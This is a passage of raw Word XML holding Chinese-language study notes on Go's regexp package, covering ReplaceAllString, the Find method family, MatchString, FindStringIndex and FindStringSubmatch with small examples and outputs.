      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, _ := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>regexp.Compile(pat)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4603011B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将匹配到的部分替换为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> "##.#"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4E360E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    str := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>re.ReplaceAllString(searchIn, "##.#")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7CC1B4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    fmt.Println(str)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501FF1BA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数为函数时</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74895684" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    str2 := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>re.ReplaceAllStringFunc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(searchIn, f)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C90003" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    fmt.Println(str2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611248E2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1582DF1F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58B653A5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Golang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正则表达式函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B3C14C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>===========================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0B7114" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Find(All)?(String)?(Submatch)?(Index)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFDD865" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正则表达式提供了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个类似的查找方法，格式为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Find(All)?(String)?(Submatch)?(Index)?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E636326" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35DF7515" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当方法名中有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>All</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的时候</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>它回继续查找非重叠的后续的字符串，返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>slice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589B7D05" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当方法名中有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的时候</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数类型是字符串，否则是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>byte slice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60181337" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当方法名中有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Submatch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的时候</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还会返回子表达式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(capturing group)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的匹配项</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A5FC20" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78C6149D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果函数要求第二个参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> n int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时，注意</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6211C5B1" w14:textId="61B6C8AE" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    re := regexp.MustCompile(</w:t>
      </w:r>
      <w:r w:rsidR="0018153A">
        <w:t>`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a.</w:t>
      </w:r>
      <w:r w:rsidR="0018153A">
        <w:t>`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED9FE7A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    fmt.Println(re.FindAllString("paranormal", -1)) //-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示返回所有匹配的值，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[ar an al]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C046CBA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    fmt.Println(re.FindAllString("paranormal", 2)) //2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个匹配的值，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[ar an]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CC16AF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    fmt.Println(re.FindAllString("paranormal", 1)) //1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个匹配的值，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[ar]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308ED579" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    fmt.Println(re.FindAllString("paranormal", 0)) //0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个匹配的值，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A048A4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    fmt.Println(re.FindAllString("graal", -1)) //[aa]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0F9E13" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    fmt.Println(re.FindAllString("none", -1)) //[]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142FFCB9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>===========================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFEF311" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42BF8CF2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="498EFB7A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D524FD0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MatchString()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CCA5E5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>regexp.MatchString()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用来匹配子字符串。下面这个例子是检查字符串是否已</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Golang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开头。我们使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>^</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来匹配字符串中以文本的开始。我们使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>^Golang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作为正则表达式进行匹配</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B051909" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9E35BF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果在字符串中有子字符串匹配这个正则表达式，那么这段代码回返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>true:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3980EB87" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Match: true Error:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D87FB9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09A8A258" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2568BE0C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FindString()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4F8F0D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FindString()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用来返回第一个匹配的结果。如果没有匹配的字符串，那么它回返回一个空的字符串，当然如果你的正则表达式就是要匹配空字符串的话，它也会返回空字符串。使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> FindStringIndex </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> FindStringSubmatch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以区分这两种情况。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2FC483" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C928072" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B5691B9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FindAllString</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632126DE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>FindString</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>All</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本，它返回所有匹配的字符串的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>slice</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。如果返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>值代表没有匹配的字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DD097D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FC1B708" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="459797B4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FindStringIndex()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A3C083" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FindStringIndex()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以得到匹配的字符串在整体字符串中的索引位置。如果没有匹配的字符串，它回返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1D3F8D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Match: [15 18] Error:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291BD586" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BDB2C3B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FindStringSubmatch()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123C8FE7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">FindStringSubmatch() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>除了返回匹配的字符串外，还会返回子表达式的匹配项。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38695ACC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果没有匹配项，则返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCD21B2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Match: [pre r] Error:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24927E7C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="230B2634" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DC5537B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ReplaceAllString()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1620978A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
